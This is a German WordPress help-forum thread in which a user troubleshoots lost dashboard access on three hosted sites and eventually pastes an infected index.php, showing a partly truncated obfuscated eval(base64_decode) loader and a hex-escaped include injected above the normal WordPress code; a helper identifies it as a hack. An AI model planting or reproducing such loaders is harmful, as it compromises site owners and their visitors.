1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

Dashboard ist nicht mehr erreichabr

Dieses Thema im Forum "Allgemeines" wurde erstellt von Scheunis, 16. Februar 2017.

  1. Scheunis

    Scheunis Member

    Registriert seit:
    16. Februar 2017
    Beiträge:
    9
    Zustimmungen:
    0
    Hallo zusammen,

    bitte entschuldigt 'Anfängerfehler', ich bin Foren-unerfahren.....

    Mein Problem ist, dass ich mich nicht mehr in meine Dashboards einwählen kann. Das Problem besteht bei drei verschiedenen Wordpress-Seiten.

    http://g-s-fotodesign.de/
    http://pia-in-australien.de
    http://chihuahua-treff.de/

    Die Seiten können 'normal' aufgerufen werden. Nur bei der Pia-in-australien.de kommt man nicht weiter, sobald das Passwort für die privaten Seiten abgefragt wird.
    Alle drei Seiten liegen bei Strato. Dorthin habe ich auch bereits geschrieben (wie in den Forenregeln angedacht). Dort wurde mir aber gesagt, da die Wortpress-Startseite erreichbar ist, wäre ihr Einflussbereich beendet.
    Ich komme zwar über den Strato-Kundenlogin (AppWizard) auf die Wordpress-Anmelde-Seite , dann allerdings kann ich mich nicht anmelden. Wenn ich über die http://Seite/wp-admin/index.php versuche mich anzumelden (wie sonst immer) erscheint nur ein leerer Bildschirm.

    Da ich nicht ins Dashboard komme ist es für mich schwierig genauere Angaben zu machen, aber ich meine Wordpress 4.72 aufgespielt zu haben, auf einer Seite (Chihuahua-Treff) 4.7.
    Zu den einzelnen Themes kann ich nun leider keine Angaben machen. Es wurde aber in letzter Zeit keine Änderung in dem Bereich vorgenommen.
    Die Chihuahua-Seite und der Block meiner Tochter wurde am Wochenende noch geändert, waren aber beide danach auch noch erreichbar. Auch der geschützte Bereich auf der Seite pia-in-australien.de. Mein Mann hat noch freudig gesagt, es gibt etwas Neuses zu lesen.....als ich dann am nächsten Tag lesen wollte, war es nicht mehr möglich.

    Die Cockies und den Cash habe ich in Firefox gelöscht - alle, da dies von Strato als evtl. Fehler angedacht war.

    Mailtext von Strato:
    Sie können sich nicht mehr in den Login bei WordPress einloggen.
    Meine Überprüfung ergab, dass die Loginseiten über den Kundenlogin im AppWizard aufrufbar sind. Da WordPress keine Produkt von STRATO ist, können wir nicht prüfen, ob WordPress nach dem Login in WordPress funktioniert. Dazu müssten Sie sich bitte einmal direkt an WordPress wenden.
    http://wpde.org/
    Möglichweise liegt die Herausforderung auch bei den Cookies. Haben Sie einmal Ihren Cacheordner und die Cooklies geleert/ gelöscht?
    Es wäre toll, wenn mir jemand helfen könnte. Mein Tochter ist zur Zeit in Australien und führt dort einen Block und alle Freunde und Verwandte sind nun traurig, da wir ihre Neuigkeiten nicht mehr lesen können.....
    Ich bin leider nicht sehr PC-Erfahren....bitte um Erklärungen auf Anfänger-Niveau.

    Schon jetzt einmal vielen Dank für jeden Leser dieser Zeilen.

    LG Andrea Scheunemann
     
  2. maxe

    maxe Well-Known Member
    Ehrenmitglied

    Registriert seit:
    1. Mai 2008
    Beiträge:
    19.581
    Zustimmungen:
    277
    Als erstes mal den plugins-Ordner via FTP-Client umbenennen, dann sind alle Plugins deaktiviert.
     
  3. JABA-Hosting

    JABA-Hosting Well-Known Member

    Registriert seit:
    29. März 2016
    Beiträge:
    2.992
    Zustimmungen:
    199
  4. Scheunis

    Scheunis Member

    Registriert seit:
    16. Februar 2017
    Beiträge:
    9
    Zustimmungen:
    0
    Hallo zusammen,

    erst einmal vielen herzlichen Dank, dass ich hier Hilfe bekomme!!!

    So ich habe mir ein ftp-Programm runter geladen und die plugin-Seite umbenannt.
    Das hat leider nichts gebracht. Ich komme nach wie vor nicht auf das Dashboard.

    Dann also die defline-Zeile entsprechend geändert.

    Somit nun diese Fehlermeldung:

    Notice: Die verwendete Konstruktor-Methode für WP_Widget in wetterinfoGadget ist seit Version 4.3.0 veraltet! Verwende stattdessen __construct(). in /mnt/web108/d0/70/5714370/htdocs/WordPress_05/wp-includes/functions.php on line 3891 Warning: session_start(): Cannot send session cookie - headers already sent by (output started at /mnt/web108/d0/70/5714370/htdocs/WordPress_05/wp-includes/random_compat/cast_to_int.php:1) in /mnt/web108/d0/70/5714370/htdocs/WordPress_05/wp-content/plugins/blog-designer/blog-designer.php on line 2133 Warning: session_start(): Cannot send session cache limiter - headers already sent (output started at /mnt/web108/d0/70/5714370/htdocs/WordPress_05/wp-includes/random_compat/cast_to_int.php:1) in /mnt/web108/d0/70/5714370/htdocs/WordPress_05/wp-content/plugins/blog-designer/blog-designer.php on line 2133 Warning: Cannot modify header information - headers already sent by (output started at /mnt/web108/d0/70/5714370/htdocs/WordPress_05/wp-includes/random_compat/cast_to_int.php:1) in /mnt/web108/d0/70/5714370/htdocs/WordPress_05/wp-includes/pluggable.php on line 1179

    Nachdem ich die Plugins auch im Ordner Wordpress5 wp-content/plugins
    in fehlerhaft umgenannt habe, kam die folgende Fehlermeldung beim Anmeldeversucht:

    Warning: Cannot modify header information - headers already sent by (output started at /mnt/web108/d0/70/5714370/htdocs/WordPress_05/wp-includes/random_compat/cast_to_int.php:1) in /mnt/web108/d0/70/5714370/htdocs/WordPress_05/wp-includes/pluggable.php on line 1179

    Was mich so irritiert, dass alle drei Seiten nicht gehen? Die Plugins der Seiten sind doch unterschiedlich und haben nichts miteinander zu tun. Jeder hat seinen eigenen Wordpress-Zugang und arbeitet unabhängig mit seiner Seite. Einzig der Server bei Strato ist für alle drei Seiten der gleiche (liegen alle unter www.scheunis.de ).

    Ich glaube, Schande auf mein Haupt.....da ist wohl Einiges los ....
    Vor über 10 Jahren hatte ich eine eigene Seite, die ich mit HTML selber geschrieben habe und per ftp hochgeladen habe. Da habe ich alles noch verstanden.....
    Jetzt machen mein Mann und meine Tochter es mit Wordpress - die haben aber noch weniger Ahnung als ich - ich habe es Ihnen nur damals eingerichtet - somit sitze ich nun hier und bin euch echt dankbar für eure Hilfe

    Nochmals herzlichen Dank - für euch sind solche Posts bestimmt nur nervig:oops:

    Andrea
     
  5. AmFearLiath

    AmFearLiath Well-Known Member

    Registriert seit:
    12. August 2012
    Beiträge:
    731
    Zustimmungen:
    0
  6. JABA-Hosting

    JABA-Hosting Well-Known Member

    Registriert seit:
    29. März 2016
    Beiträge:
    2.992
    Zustimmungen:
    199
    Das sind die 1 Klick Installationen von Strato, die öfter mal Probleme machen nach einem Update.

    Ich gehe davon aus, wenn man einfach wordpress von wordpress.org neu runterlädt und diese mit den vorhandenen Files überschreibt, wird das Problem lösen.
     
  7. Scheunis

    Scheunis Member

    Registriert seit:
    16. Februar 2017
    Beiträge:
    9
    Zustimmungen:
    0
    AmFearLiath:
    Leider ist mein Englisch wirklich nicht gut und im PC-Bereich so gut wie nicht da.... Habe es dennoch versucht zu verstehen....So wie ich es verstanden habe, sollte man nachprüfen, dass sich am Anfang und Ende des php-Datei keine Leerstellen befinden. Gut, dass habe ich auch gewissenhaft gemacht, hat aber leider auch nichts gebracht.
    Bin mir aber auch nicht sicher, ob meine Übersetzungskünste da richtig waren :(

    Ich werde es dann nun mit dem Aufspielen der neuen Wordpress-Version versuchen. Gibt es da irgendetwas, was ich besonders beachten muss? Habe auch dies bisher noch nie gemacht. Sonst habe ich immer innerhalb von Wordpress aktualisiert.

    Ich bin auf jeden Fall dankbar, dass Ihr euch bemüht mir zu helfen und werde jeden Vorschlag so gut ich kann versuchen umzusetzen, auch wenn ich bestimmt sehr deletantisch rüber komme.

    Nun reicht es mir aber für heute erst mal.....Morgen ist wohl auch noch ein Tag....
     
  8. AmFearLiath

    AmFearLiath Well-Known Member

    Registriert seit:
    12. August 2012
    Beiträge:
    731
    Zustimmungen:
    0
    manchmal liegt es auch nicht direkt an vermeintlichen leerzeichen/zeilen vor den php-tags, es kommt auch vor, dass die Dateien mit dem falschen Editor bearbeitet und im falschen Format abgespeichert wurden...

    Lade Dir z.B. mal Notepad++ runter und speicher die wp-config.php als ANSI ab
     
  9. Scheunis

    Scheunis Member

    Registriert seit:
    16. Februar 2017
    Beiträge:
    9
    Zustimmungen:
    0
    Hallo nochmals,

    ich bin immer noch nicht wirklich weiter gekommen. Nun habe ich zum allg. Verständnis ein paar Fragen und es wäre sehr nett, wenn mir diese jemand beantworten würde.

    In dem ftp-Programm habe ich nun gesehen, dass jede meine Seiten eine eigene Wordpress-Installation hat. Diese sind einfach mit Wordpress_01 / Wordpress_02 und so benannt.
    Somit hat doch jede der drei Internetauftritte sein eigenes Wordpress. Warum sind dann mit einem Schlag alle drei Seiten nicht mehr zu im Dashboard erreichen? Online sind sie ja bis auf die geschützten Seiten meiner Tochter zu sehen.....
    Nach meinem Verständnis hieße das ja nun, dass der Fehler plötzlich in allen drei Wordpress-Installationen vorkommen muss?
    Die Seiten liegen zwar alles auf dem gleichen Server bei Strato, werden aber von unterschiedlichen Personen gepflegt, es ist somit sehr unwahrscheinlich, dass drei mal der gleiche Fehler passiert ist. Zumal direkt vor dem Auftreten des Fehler keiner der drei Personen Änderungen vorgenommen hat.

    Wenn ich nun Wordpress (die aktuelle Version) neu aufspiele möchte, heißt das doch auch, dass ich sie drei mal (für jede Seite) neu aufspielen muss und die entsprechenden Einstellungen vornehmen muss.
    Ist das wirklich erfolgsversprechend?

    Bitte verzeiht, wenn meine Gedankengänge nun ganz naiv und vielleicht auch dumm sind, ich versuche das Ganze einfach zu verstehen.

    Vielen Dank an jeden der dies liest und sich Gedanken dazu macht......

    Andrea
     
  10. Scheunis

    Scheunis Member

    Registriert seit:
    16. Februar 2017
    Beiträge:
    9
    Zustimmungen:
    0
    Nachdem ich ja nun schon so einiges hin und her versucht habe und so langsam echt den Überblick verliere, habe ich mir nochmals die Fehlermeldungen anzeigen lassen.

    Hier nun der aktuelle Stand wenn der plugin-Ordner nicht umbenannt ist:

    Warning: session_start(): Cannot send session cookie - headers already sent by (output started at /mnt/web108/d0/70/5714370/htdocs/WordPress_05/wp-includes/media.php:1) in /mnt/web108/d0/70/5714370/htdocs/WordPress_05/wp-content/plugins/blog-designer/blog-designer.php on line 2133 Warning: session_start(): Cannot send session cache limiter - headers already sent (output started at /mnt/web108/d0/70/5714370/htdocs/WordPress_05/wp-includes/media.php:1) in /mnt/web108/d0/70/5714370/htdocs/WordPress_05/wp-content/plugins/blog-designer/blog-designer.php on line 2133 Warning: Cannot modify header information - headers already sent by (output started at /mnt/web108/d0/70/5714370/htdocs/WordPress_05/wp-includes/media.php:1) in /mnt/web108/d0/70/5714370/htdocs/WordPress_05/wp-includes/pluggable.php on line 1179

    Wenn der plugin-Ordner umbenannt ist sieht es dann 'nur noch' so aus:
    Warning: Cannot modify header information - headers already sent by (output started at /mnt/web108/d0/70/5714370/htdocs/WordPress_05/wp-includes/media.php:1) in /mnt/web108/d0/70/5714370/htdocs/WordPress_05/wp-includes/pluggable.php on line 1179

    Auf das Dashbord komme ich aber nach wie vor nicht.
    Selbst das neu Aufspielen der neuen Wordpress-Version hat nicht geklappt, da die install.php auch nicht erreichbar ist und auch hier nur ein leerer, weißer Bildschirm erscheint.

    Habe mich eins zu eins an die Strato-Installation gehalten (wo Wordpress komplett installiert und von Hand manuell eingerichtet wird (https://strato.de/blog/wordpress-bei-strato-manuell-installieren/)
    Erst hatte ich das Passwort falsch, da kam eine entsprechende Fehlermeldung, dann jedoch wieder nur der weiße Bildschirm.....

    Ich könnte echt so langsam heulen......

    Andrea
     
  11. Scheunis

    Scheunis Member

    Registriert seit:
    16. Februar 2017
    Beiträge:
    9
    Zustimmungen:
    0
    Habe ich gemacht - kein Erfolg.....

    Es sind nicht die 1-Click Installationen, die ich gemacht habe. Die Seiten liegen zwar bei Strato, es wurde aber Wordpress manuell installiert.
    Es gibt für jede einzelene Wordpress-Installation eine Datenbank. Ich kann auch für jede Wordpress-Installation einen eigenen ftp-Zugang einrichten. Habe ich bei einer auch schon versucht, brachte auch keinen Erfolg.

    Ich bemühe mich wirklich jeden Vorschlag umzusetzen.......

    Es ist bestimmt ein ganz blöder, super peinlicher Fehler :oops:

    Nach nun 6 Stunden am Laptop reicht es mir aber nun für heute .....Morgen soll es ja regnen:cry:

    Andrea
     
  12. b3317133

    b3317133 Well-Known Member

    Registriert seit:
    21. November 2014
    Beiträge:
    11.681
    Zustimmungen:
    1.786
    Irgendwoher kommt ein Leerzeichen, das bei Aufruf von /wp-admin/ vor wp_redirect() u.ä. ausgegeben wird. Das betrifft alle drei Websites. Seltsamer Effekt.

    Aber postiv sehen: Ist sicher lösbar, die Websites sind nach wie vor live, alle Daten vorhanden, also "halb so schlimm".
     
  13. b3317133

    b3317133 Well-Known Member

    Registriert seit:
    21. November 2014
    Beiträge:
    11.681
    Zustimmungen:
    1.786
    Die Ladereihenfolge der ersten Dateien ist bei WP 4.7.x wie folgt:
    Dann einige Initialisierungen, dann (falls vorhanden)
    Und dann einige weitere Dateien usw.

    Wenn man das Schritt für Schritt nachvollzieht, kommt man irgendwann zum Problem.

    Oder aber das Leerzeichen o.ä. kommt durch ein "auto_prepend_file" bzw. durch eine php.ini bzw. .htaccess (ggf. auch in einem den drei Installationen übergeordneten Ordner).
     
  14. Scheunis

    Scheunis Member

    Registriert seit:
    16. Februar 2017
    Beiträge:
    9
    Zustimmungen:
    0
    Hallo b3317133,

    Danke für den Zuspruch.....kann ich gebrauchen. ;)
    Und auch für den weiteren Lösungsansagtz. Jetzt habe ich wieder Input, um weiter zu suchen. War gestern echt am Ende mit jeglichen Lösungsansätzen.

    Werde dann heute Nachmittag noch mal in Ruhe alles angehen....
     
  15. Scheunis

    Scheunis Member

    Registriert seit:
    16. Februar 2017
    Beiträge:
    9
    Zustimmungen:
    0
    Hallo,
    da ich sehr unsicher bin, hier nun einmal der Code aus meinem Wordpress_01 Ordner:

    <?php eval(base64_decode("aWYgKCFkZWZpbmVkKCdBTFJFQURZX1 JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4Jykp CnsKZGVmaW5lKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhOD JhYWY2NjU4Nzg1MzU2NzE4JywgMSk7CgogJHVrdnlpcyA9IDcw OTI7IGZ1bmN0aW9uIGNqc3VsZGxtYigkeHhueHVtb3MsICRnZW JyaXcpeyRtbmFqdiA9ICcnOyBmb3IoJGk9MDsgJGkgPCBzdHJs ZW4oJHh4bnh1bW9zKTsgJGkrKyl7JG1uYWp2IC49IGlzc2V0KC RnZWJyaXdbJHh4bnh1bW9zWyRpXV0pID8gJGdlYnJpd1skeHhu eHVtb3NbJGldXSA6ICR4eG54dW1vc1skaV07fQokc2puY21vYj 0iYmFzZSIgLiAiNjRfZGVjb2RlIjtyZXR1cm4gJHNqbmNtb2Io JG1uYWp2KTt9CiRicGp3Y3dlbCA9ICdjd2pZVkVLVGdhY1B1Mk U4aGZLOGEydm5nOGhObVhPRXBYTXo5TVJTY3dqWVZFS1RnYWNQ dTJ2bmdXS2poR3VuaEd4RzRvc01TcE5Bb0g1elVmalpoMkVSU2 9CZWJha1pnYWtqJy4KJ2JsRVJWcktZYWxkelVyMEc0b3NNU3BO QW9INWpoR3VuaGpLOGdhNW5oR2R6VWZoUHhvSEZxY3pzaDJFUm FsZHpVckVaVXdqZVZhY1B4b0hGcWNQQW8xUlNWcmJQbScuCidy ZGpnZmpZZ3JjUG1qNW0wUUtRcFJNNlN5SEFvR05BbzZzMW1vNU hncmd6VWYwUG1qNW0wUUtRcCcuCidSTTY0b3M2YXdDNlNwTkFv R1JBbzFSU1ZyYlBtcmRqZ2ZqWWdyY1BtSGR1MEhFcUVYS3lyRU twZEU1NTBIUTBwV20nLgonNlN5SEFvR05BbzZzMW1vNUhncmd6 VWYwUG1IZHUwSEVxRVhLeXJFS3BkRTU1MEhRMHBXbTY0b3M2ND .
    .
    .
    .
    .Hier steht noch seitenlanger 'Text' drin......Gut, dass es die Vorschau gibt, sonst hätte ich das alles auch noch gepostet ;)
    .
    .
    .CAnWSc9Pid1JywgJ1gnPT4n RScsICdaJz0+J2YnLCAnYSc9PidYJywgJ2MnPT4nUScsICdiJz 0+J1knLCAnZSc9Pid0JywgJ2QnPT4nUicsICdnJz0+J1onLCAn Zic9PidtJywgJ2knPT4nSCcsICdoJz0+J2MnLCAnayc9PidoJy wgJ2onPT4nbCcsICdtJz0+J0knLCAnbCc9PiczJywgJ28nPT4n QycsICduJz0+J3YnLCAncSc9PidEJywgJ3AnPT4nVCcsICdzJz 0+J0EnLCAncic9PidXJywgJ3UnPT4nSicsICd0Jz0+J2onLCAn dyc9PidHJywgJ3YnPT4neCcsICd5Jz0+J1MnLCAneCc9PidNJy wgJ3onPT4ncCcpOwpldmFsLypkeXViZ29jdmoqLyhjanN1bGRs bWIoJGJwandjd2VsLCAkb3N5cndlKSk7Cn0="));

    include "\x2fhom\x65/st\x72ato\x2fhtt\x70/pr\x65miu\x6d/ri\x64/43\x2f70/\x35714\x3370/\x68tdo\x63s/W\x6frdP\x72ess\x5f01/\x77p-i\x6eclu\x64es/\x63ust\x6fmiz\x65/te\x6dpla\x74e.p\x68p";

    /**
    * Front to the WordPress application. This file doesn't do anything, but loads
    * wp-blog-header.php which does and tells WordPress to load the theme.
    *
    * @package WordPress
    */

    /**
    * Tells WordPress to load the WordPress theme and output it.
    *
    * @var bool
    */
    define('WP_USE_THEMES', true);

    /** Loads the WordPress Environment and Template */
    require( dirname( __FILE__ ) . '/wp-blog-header.php' );


    Im Wordpress_05 sieht er dann so aus:

    <?php
    /**
    * Front to the WordPress application. This file doesn't do anything, but loads
    * wp-blog-header.php which does and tells WordPress to load the theme.
    *
    * @package WordPress
    */

    /**
    * Tells WordPress to load the WordPress theme and output it.
    *
    * @var bool
    */
    define('WP_USE_THEMES', true);

    /** Loads the WordPress Environment and Template */
    require( dirname( __FILE__ ) . '/wp-blog-header.php' );


    Was ich sehr seltsam fand, den Code der index.php aus Wordpress_01 konnte ich mit meinem NotepadX gar nicht kopieren. Die Datei musste ich erst runter laden und dann mit Notepad++ kopieren. Bei dem anderen Programm (NodepadX) veränderte sich sofort der Text, sobald ich auf kopieren klicke. (Ich denke, dass war dann das, was nun auch hier erschienen ist.....)
    Bei der index.php aus dem Wordpress_05 Ordner passiert hingegen gar nicht.......

    Wordpress_02 / 03 sind leer. Scheinen alte Ordner zu sein. Wordpress_04 enthält nur wenige Dateien, keine index.php.
    Wordpress_05 ist die Seite g-s-fotodesign.de meines Mannes in der ich im Moment alles ausprobiere.
    Wordpress_06 ist der Block meiner Tochter, die zur Zeit in Australien ist. Ganz besonders um die Seite bin ich besorgt, da der Block im Moment unsere Hauptverbindungsquelle ist......
    Wordpress_07 ist eine blanke, neue Wordpad_Version. Noch nicht bearbeitet.
    Deren index.php sieht so aus.....

    <?php
    // Silence is golden.

    Das kann doch nicht richtig sein?????
    Was ist da los?

    Vielen Dank Euch schon jetzt......

    Andrea
     
  16. b3317133

    b3317133 Well-Known Member

    Registriert seit:
    21. November 2014
    Beiträge:
    11.681
    Zustimmungen:
    1.786
    Die WordPress-Installation, bei der dieser eval() Code auftritt, wurde gehackt. Man sollte jetzt a) herausfinden, über welchen Weg der Hack erfolgt ist und b) die Dateien/Datenbank bereinigen.
     
  17. MarkusHl

    MarkusHl Member

    Registriert seit:
    1. März 2015
    Beiträge:
    21
    Zustimmungen:
    0
    Hallo Andrea,

    ich habe ebenfalls eine WP Seite bei Strato laufen und kam nicht mehr ins Backend. Bei der Fehlersuche bin ich auf deinen Thread gestoßen.
    Ich habe gerade in der Verwaltung der Seite bei Strato die PHP Version geprüft. (Bei mir 7.0) Darunter war ein Haken bei "PHP Boost" gesetzt. Damit werden dann Scripte gecached. Das klang für mich wie eine blöde Idee die potentielle Probleme macht. Das Feld habe ich deswegen deaktiviert und siehe da: Ich komme endlich wieder auf das Backend.
    Check das mal unbedingt bevor du die komplette Seite zerlegst!

    Grüße
    Markus
     
  18. AmFearLiath

    AmFearLiath Well-Known Member

    Registriert seit:
    12. August 2012
    Beiträge:
    731
    Zustimmungen:
    0
    Danke für Deinen Hinweis, aber beim TE wurde ja bereits festgestellt, das seine Seite gehackt wurde :)

    Aber andere die auch auf diesen Thread aufmerksam werden, finden diesen Hinweis bestimmt hilfreich.
     
  19. Scheunis

    Scheunis Member

    Registriert seit:
    16. Februar 2017
    Beiträge:
    9
    Zustimmungen:
    0
    Hallo MarkusHl,
    danke für den Hinweis. Habe das auch gecheckt und war ok. Aber ich war ja für jeden Gedankenanstoß dankbar!

    Nun ja, ich habe dann die Flügel gestreckt und einen Profi dran gelassen - nun läuft alles wieder - freu, freu, freu......

    Dennoch allen, die hier geantwortet und sich Gedanken gemacht haben, vielen Dank!

    Andrea
     
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden